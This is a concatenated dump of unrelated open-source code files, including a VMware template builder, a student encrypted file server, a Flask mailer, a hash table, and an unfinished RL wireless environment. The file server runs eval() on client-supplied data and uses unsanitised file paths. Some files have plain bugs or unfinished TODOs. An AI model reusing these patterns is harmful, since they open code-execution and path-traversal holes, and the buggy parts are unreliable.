vApp '{self.temp_vapp_name}'\"\n self.msg_update_callback.general(msg)\n self.logger.info(msg)\n\n return VApp(self.client, href=vapp_sparse_resource.get('href'))\n\n def _customize_vm(self, vapp, vm_name):\n \"\"\"Customize a vm in a VApp using customization script.\n\n :param pyvcloud.vcd.vapp.VApp vapp:\n :param str vm_name:\n\n :raises Exception: if unable to execute the customization script in\n the vm.\n \"\"\"\n msg = f\"Customizing vApp '{self.temp_vapp_name}', vm '{vm_name}'\"\n self.msg_update_callback.general(msg)\n self.logger.info(msg)\n\n cust_script_filepath = ltm.get_script_filepath(\n self.remote_cookbook_version,\n self.template_name,\n self.template_revision,\n TemplateScriptFile.CUST\n )\n cust_script = read_data_file(\n cust_script_filepath,\n logger=self.logger,\n msg_update_callback=self.msg_update_callback\n )\n\n vs = get_vsphere(\n self.sys_admin_client,\n vapp,\n vm_name,\n logger=self.logger\n )\n callback = vgr_callback(\n prepend_msg='Waiting for guest tools, status: \"',\n logger=self.logger,\n msg_update_callback=self.msg_update_callback\n )\n wait_until_tools_ready(vapp, vm_name, vs, callback=callback)\n password_auto = vapp.get_admin_password(vm_name)\n\n try:\n time.sleep(75) # temporary hack for authentication\n result = vs.execute_script_in_guest(\n vs.get_vm_by_moid(vapp.get_vm_moid(vm_name)),\n 'root',\n password_auto,\n cust_script,\n target_file=None,\n wait_for_completion=True,\n wait_time=10,\n get_output=True,\n delete_script=True,\n callback=vgr_callback(\n logger=self.logger,\n msg_update_callback=self.msg_update_callback))\n except Exception as err:\n # TODO() replace raw exception with specific exception\n # unsure all errors execute_script_in_guest can result in\n # Docker TLS handshake timeout can occur when internet is slow\n self.msg_update_callback.error(\n \"Failed VM customization. Check CSE install log\")\n self.logger.error(f\"Failed VM customization with error: {err}\",\n exc_info=True)\n raise\n\n if len(result) > 0:\n msg = f'Result: {result}'\n self.msg_update_callback.general_no_color(msg)\n self.logger.debug(msg)\n\n result_stdout = result[1].content.decode()\n result_stderr = result[2].content.decode()\n\n msg = 'stderr:'\n self.msg_update_callback.general_no_color(msg)\n self.logger.debug(msg)\n if len(result_stderr) > 0:\n self.msg_update_callback.general_no_color(result_stderr)\n self.logger.debug(result_stderr)\n\n msg = 'stdout:'\n self.msg_update_callback.general_no_color(msg)\n self.logger.debug(msg)\n if len(result_stdout) > 0:\n self.msg_update_callback.general_no_color(result_stdout)\n self.logger.debug(result_stdout)\n\n if len(result) == 0 or result[0] != 0:\n msg = \"Failed VM customization\"\n self.msg_update_callback.error(f\"{msg}. Please check logs.\")\n self.logger.error(\n f\"{msg}\\nResult start===\\n{result}\\n===Result end\",\n exc_info=True)\n # TODO: replace raw exception with specific exception\n raise Exception(f\"{msg}; Result: {result}\")\n\n # Do not reboot VM after customization. Reboot will generate a new\n # machine-id, and once we capture the VM, all VMs deployed from the\n # template will have the same machine-id, which can lead to\n # unpredictable behavior\n\n msg = f\"Customized vApp '{self.temp_vapp_name}', vm '{vm_name}'\"\n self.msg_update_callback.general(msg)\n self.logger.info(msg)\n\n def _capture_temp_vapp(self, vapp):\n \"\"\"Capture a vapp as a template.\n\n :param pyvcloud.vcd.VApp vapp:\n \"\"\"\n msg = f\"Creating K8 template '{self.catalog_item_name}' from vApp \" \\\n f\"'{self.temp_vapp_name}'\"\n self.msg_update_callback.info(msg)\n self.logger.info(msg)\n\n # DEV NOTE: With api v33.0 and onwards, get_catalog operation will fail\n # for non admin users of an org which is not hosting the catalog, even\n # if the catalog is explicitly shared with the org in question. Please\n # use this method only for org admin and sys admins.\n catalog = self.org.get_catalog(self.catalog_name)\n try:\n msg = f\"Shutting down vApp '{self.temp_vapp_name}'\"\n self.msg_update_callback.info(msg)\n self.logger.info(msg)\n\n vapp.reload()\n task = vapp.shutdown()\n self.client.get_task_monitor().wait_for_success(task)\n vapp.reload()\n\n msg = f\"Successfully shut down vApp '{self.temp_vapp_name}'\"\n self.msg_update_callback.general(msg)\n self.logger.info(msg)\n except OperationNotSupportedException as err:\n if self.logger:\n self.logger.debug(\"Encountered error with shutting down vApp \"\n f\"'{self.temp_vapp_name}'\" + str(err))\n\n msg = f\"Capturing template '{self.catalog_item_name}' from vApp \" \\\n f\"'{self.temp_vapp_name}'\"\n self.msg_update_callback.info(msg)\n self.logger.info(msg)\n\n task = self.org.capture_vapp(catalog, vapp.href,\n self.catalog_item_name,\n self.catalog_item_description,\n customize_on_instantiate=True,\n overwrite=True)\n self.client.get_task_monitor().wait_for_success(task)\n self.org.reload()\n\n msg = f\"Created K8 template '{self.catalog_item_name}' from vApp \" \\\n f\"'{self.temp_vapp_name}'\"\n self.msg_update_callback.general(msg)\n self.logger.info(msg)\n\n def _tag_with_cse_placement_policy(self):\n \"\"\"Tag the created template with placement policies if provided.\"\"\"\n if not self.cse_placement_policy:\n msg = \"Skipping tagging template with placement policy.\"\n self.msg_update_callback.info(msg)\n self.logger.debug(msg)\n return\n assign_placement_policy_to_template(\n self.client,\n self.cse_placement_policy,\n self.catalog_name,\n self.catalog_item_name,\n self.org_name,\n logger=self.logger,\n log_wire=self.log_wire,\n msg_update_callback=self.msg_update_callback)\n\n def build(self, force_recreate=False, retain_temp_vapp=False):\n \"\"\"Create a K8 template.\n\n :param bool force_recreate: if True and template already exist in vCD,\n overwrites existing template.\n :param bool retain_temp_vapp: if True, temporary vApp will not be\n deleted, so the user can ssh into its vm and debug.\n \"\"\"\n if not self._is_valid:\n raise Exception('Invalid params for building template.')\n\n if not force_recreate:\n if vcd_utils.catalog_item_exists(\n org=self.org,\n catalog_name=self.catalog_name,\n catalog_item_name=self.catalog_item_name\n ):\n self._tag_with_cse_placement_policy()\n msg = f\"Found template '{self.template_name}' at revision \" \\\n f\"{self.template_revision} in catalog \" \\\n f\"'{self.catalog_name}.'\"\n self.msg_update_callback.general(msg)\n self.logger.info(msg)\n return\n else:\n self._cleanup_old_artifacts()\n\n self._upload_source_ova()\n vapp = self._create_temp_vapp()\n self._customize_vm(vapp, self.temp_vm_name)\n self._capture_temp_vapp(vapp)\n self._tag_with_cse_placement_policy()\n if not retain_temp_vapp:\n self._delete_temp_vapp()\n","repo_name":"vmware/container-service-extension","sub_path":"container_service_extension/installer/templates/template_builder.py","file_name":"template_builder.py","file_ext":"py","file_size_in_byte":20731,"program_lang":"python","lang":"en","doc_type":"code","stars":77,"dataset":"github-code","pt":"76"} +{"seq_id":"38818722076","text":"import os\nimport pickle\nfrom threading import Thread\nimport time\nfrom queue import Queue, Empty\nimport secrets\nimport sys\nimport socket\nimport string\n\nimport tools.toolbox as tb\nfrom tools.layer import Layer\nfrom database.database import Database\n\ndata = b\"\"\n\"\"\"\nlayer1 = Layer()\nlayer1.change_keys(\"1\")\nlayer2 = Layer()\nlayer2.change_keys(\"2\")\n\"\"\"\n\nfinished = False\nsessions = {}\nconversations = {}\nsock_to_layer = {}\npersonal_port = 55559\nip = None\n\nlayer0 = Layer()\nserver_layer = Layer()\nkey_dir = \"keys/\"\n\n\ndef find_my_ip():\n global ip\n s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n s.connect(('8.8.8.8', 80))\n nat_ip_address = s.getsockname()[0]\n s.close()\n ip = nat_ip_address\n\n\ndef boot(HOST, PORT):\n \"\"\"\n Makes a connection with the directory server\n :param HOST: directory server ip\n :param PORT: directory server port\n :return:\n \"\"\"\n global ip\n\n find_my_ip()\n\n server_layer.store_keys(key_dir)\n with open(key_dir + \"public_key.pem\", \"r\") as k:\n pk = k.read()\n\n client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n client_socket.bind((ip, personal_port))\n client_socket.connect((HOST, PORT))\n\n message = b\"S\" + pickle.dumps((ip, personal_port, \"CONNECTING\", pk))\n\n client_socket.send(message)\n response = client_socket.recv(1024).decode('utf-8')\n\n print(response)\n if response != \"OK\" and response != \"REACTIVATED\":\n input()\n\n client_socket.close()\n\n\ndef packet_handle():\n \"\"\"\n starts server and allows listening\n :return:\n \"\"\"\n global ip\n server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n server_address = (ip, personal_port)\n server_socket.bind(server_address)\n\n server_socket.listen(5)\n print(\"Server is listening on\", server_address)\n\n while True:\n client_socket, client_address = server_socket.accept()\n\n # Create a thread to handle the client\n client_thread = Thread(target=handle_client, args=(client_socket, client_address))\n client_thread.start()\n\n\ndef handle_client(client_socket, client_address):\n print(\"Connected:\", client_address)\n db = Database()\n\n while True:\n data = recv_all(client_socket)\n if not data[1]:\n break\n data = data[0]\n if not data:\n break\n process_data(data, client_socket, client_address, db)\n\n client_socket.close()\n if client_socket in sessions:\n del sessions[client_socket]\n print(\"Disconnected:\", client_address)\n\n\ndef process_data(data, client_socket, client_address, db):\n global conversations\n\n key = str(client_address)\n data = decrypt_packet(data)\n\n code = data[:1]\n\n if code == b\"I\":\n signin(key, data[1:], client_socket, db)\n return\n if code == b\"S\":\n signup(key, data[1:], client_socket, db)\n return\n if code == b\"B\":\n save_pk(key, data[1:], client_socket)\n reply(b\"Started\", b'\\xf2\\xee\\x07', client_socket)\n return\n\n if client_socket not in sessions:\n reply(b\"Not signed-in\", b'\\xf2\\xee\\x07', client_socket)\n return\n\n if code == b\"U\":\n if client_socket in conversations:\n upload_request(key, data[1:], client_socket)\n else:\n file_name = data[1:]\n conversations[client_socket] = file_name\n # blue v for accepting\n reply(b\"Request accepted\", b'\\xf2\\xee\\x07', client_socket)\n return\n if code == b\"D\":\n file_names = data[1:]\n download(key, file_names, client_socket)\n return\n if code == b\"L\":\n send_list(key, client_socket)\n return\n\n\ndef save_pk(key, pk, cs):\n global sock_to_layer\n with open(key_dir + f\"public_key[{key}]\".replace(\".\", \"_\") + \".pem\", \"wb\") as k:\n k.write(pk)\n\n l = Layer()\n l.change_keys(key_dir, f\"[{key}]\".replace(\".\", \"_\"), False)\n sock_to_layer[cs] = l\n\n\ndef signin(key, user, cs, db):\n h, auth = pickle.loads(user)\n if not db.check_user_exists(h):\n reply(b\"Hash incorrect\", b'\\xd3\\xb6\\xad', cs)\n return\n if not db.check_user_otp(h, auth):\n reply(b\"Auth incorrect\", b'\\xd3\\xb6\\xad', cs)\n return\n reply(b\"sign in successful\", b'\\xc6\\xbd\\x06', cs)\n sessions[cs] = db.get_user_by_hash(h)[0]\n\n\ndef signup(key, user, cs, db):\n alphabet = string.ascii_letters + string.digits\n random_hash = ''.join(secrets.choice(alphabet) for _ in range(10))\n\n result = db.add_user(random_hash)\n print(result)\n print(db.get_all_users())\n if result:\n sessions[cs] = db.get_user_by_hash(random_hash)[0]\n os.mkdir(f\"server_files/f{sessions[cs]}\")\n reply(pickle.dumps((random_hash, result)), b'\\x9d\\xf6\\x9e', cs)\n else:\n reply(b\"User already exists\", b'\\xd3\\xb6\\xad', cs)\n\n\ndef send_list(key, cs):\n user_folder = sessions[cs]\n entries = os.scandir(f\"server_files/f{user_folder}\")\n entry_list = list_from_iter(entries)\n if \"Thumbs.db\" in entry_list:\n entry_list.remove(\"Thumbs.db\")\n reply(str(entry_list).encode('utf-8'), b'\\x98\\x16\\xac', cs)\n\n\ndef download(key, file_names, cs):\n user_folder = sessions[cs]\n file_names = eval(file_names)\n\n # blue v for accepting\n reply(b\"Request accepted\", b'\\xf2\\xee\\x07', cs)\n\n for file in file_names:\n with open(f\"server_files/f{user_folder}/{file}\", \"rb\") as f:\n data = f.read()\n print(len(data))\n reply(file.encode(), b'\\xa7\\x98\\xa8', cs)\n reply(data, b'\\xa7\\x98\\xa8', cs)\n\n\ndef upload_request(key, load, cs):\n global conversations\n\n upload(load, conversations[cs], key, cs)\n del conversations[cs]\n\n\ndef upload(data, file_name, key, cs):\n user_folder = sessions[cs]\n with open(f\"server_files/f{user_folder}/{file_name.decode()}\", \"wb\") as i:\n i.write(data)\n time.sleep(0.001)\n reply(b'upload complete', b'\\x9d\\xb7\\xe3', cs)\n\n\ndef reply(data, code_prefix, sock):\n \"\"\"\n Sends back replies on received messages to imitate a server\n :param code_prefix: to let other side know meaning of aproach\n :param data: The data that is to be replied\n :param sock: client socket\n :return:\n \"\"\"\n sendable_data = encrypt_packet(code_prefix + data, sock)\n sock.sendall(str(len(sendable_data)).zfill(10).encode() + sendable_data)\n\n\ndef list_from_iter(iter):\n l = []\n for i in iter:\n l.append(i.name)\n return l\n\n\ndef decrypt_packet(data):\n decrypted_data = server_layer.decrypt(data)\n return decrypted_data\n\n\ndef encrypt_packet(data, cs):\n global sock_to_layer\n layer = sock_to_layer[cs]\n encrypted_data = layer.b_encrypt(data)\n return encrypted_data\n\n\ndef recv_all(sock):\n \"\"\"\n function that receive data from socket by the wanted format\n :param sock: socket\n :return: tuple - (msg/error - str, status(True for ok, False for error))\n \"\"\"\n try:\n msg_size = sock.recv(10)\n except:\n return \"recv error\", False\n if not msg_size:\n return \"msg length error\", False\n try:\n msg_size = int(msg_size)\n except: # not an integer\n return \"msg length error\", False\n\n msg = b''\n # this is a fail - safe -> if the recv not giving the msg in one time\n while len(msg) < msg_size:\n try:\n msg_fragment = sock.recv(msg_size - len(msg))\n except:\n return \"recv error\", False\n if not msg_fragment:\n return \"msg data is none\", False\n msg = msg + msg_fragment\n\n return msg, True\n\n\nif __name__ == '__main__':\n if len(sys.argv) > 1:\n personal_port = int(sys.argv[1])\n\nboot(\"10.0.0.24\", 55677)\npacket_handle()\n","repo_name":"nom28/Tor_Final_Project","sub_path":"server/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":7670,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"16124448310","text":"from flask import Flask, request\nfrom flask_mail import Mail, Message\n\napp = Flask(__name__)\napp.config['MAIL_SERVER']='smtp.gmail.com'\napp.config['MAIL_PORT'] = 465\napp.config['MAIL_USERNAME'] = 'username@gmail.com'\napp.config['MAIL_PASSWORD'] = 'password'\napp.config['MAIL_USE_TLS'] = False\napp.config['MAIL_USE_SSL'] = True\nmail = Mail(app)\n\n@app.route('/send_message', methods=['POST'])\ndef send_newsletter():\n subject = request.get_json()['subject']\n message = request.get_json()['message']\n sender = request.get_json()['sender_mail']\n recipients = request.get_json()['recipients_mail']\n send_request = Message(f'{subject}', sender = f'{sender}', recipients = recipients)\n send_request.body = f\"{message}\"\n mail.send(send_request)\n return \"Message envoyé aux abonnés de la newsletter\"\n\nif __name__ == '__main__':\n app.run(debug=True)\n","repo_name":"Chris000888/newsletter","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":868,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"29784610081","text":"alpha=0.75 #全局变量,表示装填因子\r\nclass HNode: #单链表结点类\r\n def __init__(self,k,v): #构造方法\r\n self.key=k #关键字\r\n self.v=v #值\r\n self.next=None\r\n\r\nclass Dict: #哈希表(除留余数法+拉链法)\r\n def __init__(self): #构造方法\r\n self.cap=8 #设置初始容量为8,即哈希表长度m=8\r\n self.n=0 #哈希表中元素个数\r\n self.ha=[None]*self.cap #分配哈希表的cap个桶\r\n\r\n def resize(self): #按两倍扩大容量\r\n newha=[None]*2*self.cap\r\n self.n=0\r\n for i in range(self.cap):\r\n p=self.ha[i]\r\n while p!=None:\r\n d=hash(p.key) % self.cap #求哈希函数值\r\n q=HNode(p.key,p.v) #新建结点q\r\n q.next=newha[d] #采用头插法将q插入到newha[d]单链表中\r\n newha[d]=q\r\n self.n+=1 #哈希表元素个数增1\r\n p=p.next\r\n self.ha=newha\r\n self.cap=2*self.cap\r\n\r\n def insert(self,k,v): #在哈希表中插入(k,v)\r\n if self.n>=int(alpha*self.cap): #若元素个数大于等于期望的元素个数\r\n self.resize() #扩大容量\r\n p=self.search(k) #查找关键字k\r\n if p!=None: #若存在关键字k\r\n p.v=v #更新v\r\n else: #若不存在关键字k,插入\r\n d=hash(k) % self.cap #求哈希函数值\r\n p=HNode(k,v) #新建关键字k的结点p\r\n p.next=self.ha[d] #采用头插法将p插入到ha[d]单链表中\r\n self.ha[d]=p\r\n self.n+=1 #哈希表元素个数增1\r\n\r\n def search(self,k):\t #查找关键字k,成功时返回其地址,否则返回空\r\n d=hash(k) % self.cap\t\t #求哈希函数值\r\n p=self.ha[d] #p指向ha[d]单链表的首结点\r\n while p!=None and p.key!=k: #查找key为k的结点p\r\n p=p.next\r\n return p #返回p\r\n\r\n def __contains__(self,k): #in运算符重载\r\n if self.search(k)!=None:\r\n return True\r\n else:\r\n return False\r\n\r\n def __getitem__(self,k): #按关键字取值\r\n p=self.search(k)\r\n if p!=None:\r\n return p.v\r\n else:\r\n return None\r\n \r\n def __setitem__(self,k,d): #按关键字赋值\r\n self.insert(k,d)\r\n\r\n def delete(self,k): #删除关键字k\r\n d=hash(k) % self.cap\r\n if self.ha[d]==None: return\r\n if self.ha[d].next==None: #ha[d]只有一个结点\r\n if self.ha[d].key==k:\r\n self.ha[d]=None\r\n return\r\n pre=self.ha[d] #ha[d]有一个以上结点\r\n p=p.next\r\n while p!=None and p.key!=k:\r\n pre=p #pre和p同步后移\r\n p=p.next\r\n if p!=None: #找到关键字为k的结点p\r\n pre.next=p.next #删除结点p\r\n\r\n def dispht(self): #输出所有元素\r\n for i in range(self.cap):\r\n p=self.ha[i]\r\n while p!=None:\r\n print(\"%3d[%d]\" %(p.key,p.v),end='')\r\n p=p.next\r\n print()\r\n \r\n#主程序\r\nif __name__ == '__main__':\r\n a=[1,2,5,4,1,2,5,1,6,20,5,10,9,6]\r\n print(\"(1)建立dic\")\r\n dic=Dict()\r\n print(\" 初始容量:\",dic.cap)\r\n print(\"(2)插入若干元素\")\r\n for i in range(len(a)):\r\n if a[i] in dic: #若a[i]已存在,次数增1\r\n dic[a[i]]+=1\r\n else: #若a[i]不存在,次数置为1\r\n dic[a[i]]=1\r\n print(\" 容量:\",dic.cap)\r\n print(\"(3)输出所有的元素:\")\r\n dic.dispht()\r\n k=2\r\n print(\"(4)删除关键字%d\" %(k))\r\n dic.delete(2)\r\n print(\"(5)删除后所有元素:\")\r\n dic.dispht()\r\n \r\n","repo_name":"renyumeng1/sound-code","sub_path":"ch8/Exam8-19.py","file_name":"Exam8-19.py","file_ext":"py","file_size_in_byte":4367,"program_lang":"python","lang":"zh","doc_type":"code","stars":2,"dataset":"github-code","pt":"76"} +{"seq_id":"562410951","text":"import site\ntry:\n\timport cv2\nexcept ImportError:\n\tsite.addsitedir('D:\\\\Program Files\\\\opencv-4.5.0-dldt-2021.1-vc16-avx2\\\\opencv\\\\build\\\\python')\nimport cv2\nimport argparse\nfrom pathlib import Path\nimport numpy as np\n\n\nif __name__ == '__main__':\n\tparser = argparse.ArgumentParser()\n\tparser.add_argument('input', type=Path, nargs=1)\n\tparser.add_argument('output', type=Path, nargs=1)\n\targs = parser.parse_args()\n\n\tinput_path: Path = args.input[0]\n\toutput_path: Path = args.output[0]\n\tif not input_path.is_dir() and output_path.is_dir():\n\t\tprint('converting npy to png...')\n\n\t\tdataset = np.load(input_path)\n\t\tfor idx, row in enumerate(dataset):\n\t\t\tfilename = '%s/%s.png' % (output_path, str(idx))\n\t\t\tprint('writing', filename)\n\t\t\tcv2.imwrite(filename, row)\n\n\tif input_path.is_dir() and not output_path.is_dir():\n\t\tprint('converting png to npy...')\n\t\toutput_dataset = []\n\t\tfor file in input_path.glob('*.png'):\n\t\t\tfilename = file.as_posix()\n\t\t\tprint('reading', filename)\n\t\t\timg = cv2.imread(filename, cv2.IMREAD_ANYDEPTH)\n\t\t\toutput_dataset.append(img)\n\t\tout: np.ndarray = np.asarray(output_dataset)\n\t\tprint('output array size', out.shape)\n\t\tnp.save(output_path, out)\n\n\tprint('done')\n","repo_name":"bearnl/toolbox","sub_path":"npy2png.py","file_name":"npy2png.py","file_ext":"py","file_size_in_byte":1180,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"39314260433","text":"from gym import spaces\n# import Paras\nimport copy\nimport math\nimport os\nimport glob\nimport time\nfrom datetime import datetime\n\nimport torch\nimport numpy as np\nimport gym\n\nfrom gym import spaces\nimport copy\nimport math\nimport os\nimport glob\nimport time\nfrom datetime import datetime\n\n#TODO discrete deployment?\nclass My_Env(gym.Env):\n def __init__(self):\n super(My_Env, self).__init__()\n\n self.K = 6 #total users\n\n self.M = 4 #antenna number\n self.N = 10 #STAR-RIS element number\n self.N_h = 2 #horizontal element number\n self.N_v = self.N/self.N_h #vertical element number\n\n self.power_unit = 100 #TODO for each user power unit?\n self.B = 1 #MHz? to calculate data rate by multiple SINR\n self.noise_power = 3*10**(-13) #noise power\n\n self.T = 50 #DRL max steps\n self.sum_rate = 0 #reward as sum-rate\n\n self.W_list = np.ones(shape=(self.M, self.K)) + 0 * 1j\n\n self.CSI_B_K = np.random.normal(scale=1, size=(self.M, self.K)) + np.random.normal(scale=1, size=(self.M, self.K)) * 1j\n self.CSI_R_K = np.random.normal(scale=1, size=(self.N, self.K)) + np.random.normal(scale=1, size=(self.N, self.K)) * 1j\n self.CSI_B_R = np.random.normal(scale=1, size=(self.M, self.N)) + np.random.normal(scale=1, size=(self.M, self.N)) * 1j\n\n self.FD_B_K = np.random.normal(scale=1, size=(self.M, self.K, self.T)) + np.random.normal(scale=1, size=(self.M, self.K, self.T)) * 1j\n self.FD_R_K = np.random.normal(scale=1, size=(self.N, self.K, self.T)) + np.random.normal(scale=1, size=(self.N, self.K, self.T)) * 1j\n self.FD_B_R = np.random.normal(scale=1, size=(self.M, self.N, self.T)) + np.random.normal(scale=1, size=(self.M, self.N, self.T)) * 1j\n\n # fading intensity\n self.fading_scale_BS = 0.1\n self.fading_scale_RIS = 0.2\n self.FD_B_K = self.fading_scale_BS * self.FD_B_K\n self.FD_R_K = self.fading_scale_RIS * self.FD_R_K\n self.FD_B_R = self.fading_scale_RIS * self.FD_B_R #TODO should be RIS fading scale?\n self.Rice = 5 # Rician factor\n self.scale = 10000\n\n # positions\n self.BS_position = [2000, 2000, 5]\n self.STAR_position = [0, 0, 200]\n self.link_position = [0, 0, 0]\n self.type = np.zeros(shape=(1, self.K))\n self.P_K_list = np.random.normal(scale=3, size=(3, self.K))\n self.P_K_list[3, :] = 0\n self.P_K_list_initial = copy.deepcopy(self.P_K_list)\n self.t = 0\n\n # create vectors for storing the R/T coefficients\n # theta represents phase shift\n self.theta_R = np.random.normal(scale=1, size=(self.N)) + np.random.normal(scale=1, size=(self.N)) * 1j\n self.theta_T = np.random.normal(scale=1, size=(self.N)) + np.random.normal(scale=1, size=(self.N)) * 1j\n # Theta_eye represents the matrix to save phase shift\n self.Theta_eye_R = np.eye(self.N)\n self.Theta_eye_T = np.eye(self.N)\n # save data rate for each user\n self.data_rate_list = np.zeros(self.K)\n # self.data_rate_list_R = np.zeros(self.KR)\n # self.data_rate_list_T = np.zeros(self.KT)\n\n # N reflection phase shift, N reflection amplitude, N transmission phase shift, M*K phase shift, M*K power,\n # x y z position for STAR_RIS, number of linked user, move up / down\n self.action_dim = 3 * self.N + 2 * self.M * self.K + 2 + 1 + 1\n self.action_space = spaces.Box(low=0, high=1, shape=(self.action_dim,), dtype=np.float32)\n # BS to user CSI, STAR-RIS element to user CSI, BS to STAR-RIS element CSI\n self.num_states = 2*self.M * self.K + 2*self.N * self.K + 2*self.M*self.N\n self.observation_space = spaces.Box(low=0, high=100, shape=(self.num_states,), dtype=np.float32)\n\n\n\n\n #TODO calculate CSI information\n def calculate_CSI(self):\n # calculate pathloss from BS to STAR-RIS\n distance_B_R = np.sqrt((self.BS_position[0]-self.STAR_position[0])**2 + (self.BS_position[1]-self.STAR_position[1])**2 + (self.BS_position[2]-self.STAR_position[2])**2)\n pathloss_B_R = 10 ** (-30 / 10) * (distance_B_R ** (-2.2))\n\n # calculate DOD\n return\n\n #TODO calculate data rate for each user\n def calculate_datarate(self):\n\n return\n\n #TODO get the observation environment\n def get_state(self):\n CSI_B_K_state = self.CSI_B_K.ravel()\n CSI_R_K_state = self.CSI_R_K.ravel()\n CSI_B_R_state = self.CSI_B_R.ravel()\n CSI_B_K_info = np.append(np.real(CSI_B_K_state), np.imag(CSI_B_K_state))\n CSI_R_K_info = np.append(np.real(CSI_R_K_state), np.imag(CSI_R_K_state))\n CSI_B_R_info = np.append(np.real(CSI_B_R_state), np.imag(CSI_B_R_state))\n #TODO need confirmation\n return np.append([CSI_B_R_info*self.scale, CSI_B_K_info*self.scale, CSI_R_K_info*self.scale])\n\n #TODO user random move\n def user_move(self):\n # perform random movement for users\n self.P_K_list[0, :] = self.P_K_list[0, :] + np.random.normal(scale=0.5, size=(1, self.K))\n self.P_K_list[1, :] = self.P_K_list[1, :] + np.random.normal(scale=0.5, size=(1, self.K))\n\n # TODO divide users into reflection and transmission\n # 1 represents reflection\n # -1 represents transmission\n def divide(self):\n for i in range(self.K):\n if ((self.P_K_list[i][0] - self.STAR_position[0]) / (self.link_position[0] - self.STAR_position[0]) -\n (self.P_K_list[i][1] - self.STAR_position[1]) / (self.link_position[1] - self.STAR_position[1])) * \\\n ((self.BS_position[0] - self.STAR_position[0]) / (self.link_position[0] - self.STAR_position[0]) -\n (self.BS_position[1] - self.STAR_position[1]) / (self.link_position[1] - self.STAR_position[1])) >= 0:\n self.type[i] = 1\n else:\n self.type[i] = -1\n\n\n #TODO step function\n def step(self, action):\n action = action.reshape(-1)\n\n # reflection coefficient\n phaseshift_relfection = action[0:self.N] * math.pi\n amplitude_reflection = (action[self.N:2*self.N] + 1) / 2 # why +1/2\n self.theta_R = math.cos(phaseshift_relfection) * amplitude_reflection + math.sin(phaseshift_relfection) * amplitude_reflection * 1j\n self.Theta_eye_R = np.eye(self.N) * self.theta_R\n\n # transmission coefficient >=0 pi/2, <0 -pi/2\n phaseshift_transmission = (action[2*self.N:3*self.N] >= 0) * 1 * math.pi/2 + (action[2*self.N:3*self.N] < 0) * -1 * math.pi/2\n amplitude_transmission = np.sqrt(1 - amplitude_reflection**2)\n self.theta_T = math.cos(phaseshift_transmission) * amplitude_transmission + math.sin(phaseshift_transmission) * amplitude_transmission * 1j\n self.Theta_eye_T = np.eye(self.N) * self.theta_T\n\n # BS beamforming\n phaseshift_BS = action[3*self.N:3*self.N+self.M*self.K] * math.pi\n power_BS = (action[3*self.N+self.M*self.K:3*self.N+2*self.M*self.K] + 1)/2 * self.power_unit\n w_array = np.cos(phaseshift_BS) * power_BS + np.sin(phaseshift_BS) * power_BS * 1j\n self.W_list = np.reshape(w_array, (self.M, self.K))\n\n # STAR-RIS position and face direction\n self.STAR_position = [action[3*self.N+2*self.M*self.K]*100, action[3*self.N+2*self.M*self.K+1]*100, 200]\n self.link_position = [self.P_K_list[0][6*action[3*self.N+2*self.M*self.K+2]] + action[3*self.N+2*self.M*self.K+3] * 10,\n self.P_K_list[1][6*action[3*self.N+2*self.M*self.K+2]],\n self.P_K_list[2][6*action[3*self.N+2*self.M*self.K+2]]]\n\n self.divide()\n self.calculate_datarate()\n self.sum_rate = sum(self.data_rate_list)\n\n self.user_move()\n self.calculate_CSI()\n next_state = self.get_state()\n self.t += 1\n if self.t >= self.T:\n done = True\n else:\n done = False\n\n return np.array([next_state]).astype(np.float32), self.sum_rate, done\n\n #TODO reset the environmrnt, user position, time, observation state, STAR position???\n def reset(self, *args, **kwargs):\n self.P_K_list = copy.deepcopy(self.P_K_list_initial)\n state = self.get_state()\n self.t = 0\n return np.array([state]).astype(np.float32)\n\n #TODO","repo_name":"Porthoos/DRL_STAR_LYW","sub_path":"Deep-Reinforcment-Learning-main/Communication GYM/STAR-RIS/My_Env.py","file_name":"My_Env.py","file_ext":"py","file_size_in_byte":8429,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"45558651583","text":"#!/usr/bin/env python3\n\n\"\"\"Prepares a simple TVM library for testing.\"\"\"\n\nfrom os import path as osp\nimport sys\n\nimport tvm\n\ndef main():\n n = tvm.var('n')\n A = tvm.placeholder((n,), name='A')\n B = tvm.placeholder((n,), name='B')\n C = tvm.compute(A.shape, lambda *i: A(*i) + B(*i), name='C')\n s = tvm.create_schedule(C.op)\n s[C].parallel(s[C].op.axis[0])\n print(tvm.lower(s, [A, B, C], simple_mode=True))\n tvm.build(s, [A, B, C], 'llvm --system-lib').save(osp.join(sys.argv[1], 'test.o'))\n\nif __name__ == '__main__':\n main()\n","repo_name":"researchmm/tasn","sub_path":"tasn-mxnet/3rdparty/tvm/rust/tests/test_tvm_basic/src/build_test_lib.py","file_name":"build_test_lib.py","file_ext":"py","file_size_in_byte":551,"program_lang":"python","lang":"en","doc_type":"code","stars":216,"dataset":"github-code","pt":"76"} +{"seq_id":"2460101117","text":"# -*- coding: utf-8 -*-\n\"\"\"基金经理选券择时因子(聚源计算)\"\"\"\nimport datetime as dt\n\nimport numpy as np\nimport pandas as pd\n\nimport QuantStudio.api as QS\nfd = QS.FactorDB.FactorTools\nFactorize = QS.FactorDB.Factorize\n\n\ndef defFactor(args={}, debug=False):\n Factors = []\n \n JYDB = args[\"JYDB\"].connect()\n \n FT = JYDB.getTable(\"公募基金经理(新)(基金经理ID)\", args={\"多重映射\": True})\n IDs = FT.getID()\n \n # ####################### Brinson 模型 #######################\n FT = JYDB.getTable(\"公募基金衍生指标_基金经理Brinson业绩归因\", args={\"回溯天数\": 0})\n look_back_period = {\"6m\": 6, \"1y\": 12, \"2y\": 24, \"3y\": 36, \"5y\": 60, \"10y\": 120}# 回溯期\n for iLookBack, iLookBackPeriod in look_back_period.items():\n Factors.append(FT.getFactor(\"资产配置\", args={\"指标周期\": str(iLookBackPeriod)}, new_name=f\"brinson_aa_{iLookBack}\"))\n Factors.append(FT.getFactor(\"个股选择\", args={\"指标周期\": str(iLookBackPeriod)}, new_name=f\"brinson_ss_{iLookBack}\"))\n 